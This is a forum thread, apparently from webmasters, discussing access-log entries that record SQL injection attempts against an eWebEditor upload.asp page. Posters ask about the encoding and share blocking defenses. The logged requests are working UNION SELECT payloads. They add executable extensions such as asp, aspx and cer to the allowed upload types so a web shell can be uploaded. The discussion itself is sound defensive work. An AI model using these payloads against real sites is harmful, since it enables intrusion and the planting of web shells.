Forum Moderators: open
107.150.33.138 - - [06/Mar/2015:01:41:06 -0800] "POST /upload.asp?action=save&type=IMAGE&style=style=standard'
and 1=3 union select
S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]+'|cer|aspx|cdx|asp|asaspp',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,
S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a HTTP/1.1" 403 3250 "-" "Mozilla/5.0 (Auto Shell Spider)"
107.150.33.138 - - [06/Mar/2015:01:41:07 -0800] "POST /upload.asp?action=save&type=IMAGE&style=standard'
and 1=2 union select
S_ID,S_Name,S_Dir,S_EditorHeader,S_Body,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]+'|cer|aspx|cdx|asp|asaspp',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,
S_StateFlag,S_DetectFromWord from ewebeditor_style where s_name='standard' and'a'='a HTTP/1.1" 403 3250 "-" "Mozilla/5.0 (Auto Shell Spider)" I'm also curious as to what the encoding means?
action=save&type=IMAGE&style=style=standard'%20%20and%201=3%20union%20select %20%5BS_ImageExt%5D%2b'%7Ccer%7Caspx%7Ccdx%7Casp%7Casaspp' Almost anything can be wrapped up as an image file.
S_DetectFromWord from ewebeditor_style where s_name='standard' and'a'='a
Is upload.asp part of some ubiquitous CMS package, in the same way that there are /wp-admin/ directories all over the place?
...wonder if they ran out of room at the end
POST & PUT have always seemed like a huge security risk
Microsoft Data Access Internet Publishing Provider DAV 1.1
I've personally blocked all POST requests except for the one or two specific pages (like contact form) that are meant to support POST.
ModSecurity: Multipart parsing error: Multipart: Final boundary missing. name = 'standard'_and'a' = 'a